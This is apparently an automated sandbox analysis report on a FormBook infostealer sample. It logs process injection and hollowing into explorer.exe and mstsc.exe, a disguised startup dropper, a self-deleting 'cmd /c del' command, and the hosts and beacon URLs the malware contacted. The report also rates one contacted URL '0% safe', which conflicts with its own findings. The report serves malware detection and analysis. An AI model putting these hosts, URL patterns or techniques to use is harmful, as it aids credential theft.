          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EB8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E43D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E83540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EB3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E27D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E8A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E48EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EBFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EBFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E38E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E18794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\kayx.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\kayx.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\kayx.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.141 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\kayx.exeMemory written: C:\Users\user\Desktop\kayx.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\kayx.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\kayx.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\kayx.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\kayx.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\kayx.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\kayx.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 3F0000
          Source: C:\Users\user\Desktop\kayx.exeProcess created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
          Source: C:\Users\user\Desktop\kayx.exeProcess created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
          Source: C:\Users\user\Desktop\kayx.exeProcess created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'
          Source: explorer.exe, 00000012.00000002.482884776.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\kayx.exeQueries volume information: C:\Users\user\Desktop\kayx.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe VolumeInformation
          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_05C4C920 GetUserNameA,
          Source: C:\Users\user\Desktop\kayx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Registry Run Keys / Startup Folder11Process Injection612Masquerading1Input Capture1Query Registry1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Virtualization/Sandbox Evasion3LSASS MemorySecurity Software Discovery321Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery112Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 321226 Sample: kayx.exe Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 43 www.amtpsychology.com 2->43 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for dropped file 2->53 55 Antivirus / Scanner detection for submitted sample 2->55 57 6 other signatures 2->57 11 kayx.exe 1 4 2->11         started        signatures3 process4 file5 37 C:\Users\user\AppData\...\firefoxe.exe, PE32 11->37 dropped 39 C:\Users\...\firefoxe.exe:Zone.Identifier, ASCII 11->39 dropped 41 C:\Users\user\AppData\Local\...\kayx.exe.log, ASCII 11->41 dropped 67 Detected unpacking (changes PE section rights) 11->67 69 Tries to detect virtualization through RDTSC time measurements 11->69 71 Injects a PE file into a foreign processes 11->71 15 kayx.exe 11->15         started        18 kayx.exe 11->18         started        20 kayx.exe 11->20         started        signatures6 process7 signatures8 73 Modifies the context of a thread in another process (thread injection) 15->73 75 Maps a DLL or memory area into another process 15->75 77 Sample uses process hollowing technique 15->77 79 Queues an APC in another process (thread injection) 15->79 22 explorer.exe 2 15->22 injected process9 dnsIp10 45 jibenentreprenad.mobi 184.168.131.241, 49744, 80 AS-26496-GO-DADDY-COM-LLCUS United States 22->45 47 www.jibenentreprenad.mobi 22->47 49 2 other IPs or domains 22->49 59 System process connects to network (likely due to code injection or exploit) 22->59 26 mstsc.exe 22->26         started        29 firefoxe.exe 22->29         started        31 firefoxe.exe 22->31         started        signatures11 process12 signatures13 61 Modifies the context of a thread in another process (thread injection) 26->61 63 Maps a DLL or memory area into another process 26->63 65 Tries to detect virtualization through RDTSC time measurements 26->65 33 cmd.exe 1 26->33         started        process14 process15 35 conhost.exe 33->35         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          kayx.exe35%VirustotalBrowse
          kayx.exe46%ReversingLabsByteCode-MSIL.Infostealer.Maslog
          kayx.exe100%AviraTR/Dropper.MSIL.blecg
          kayx.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe100%AviraTR/Dropper.MSIL.blecg
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe46%ReversingLabsByteCode-MSIL.Infostealer.Maslog

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          17.2.kayx.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          17.1.kayx.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.jibenentreprenad.mobi/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
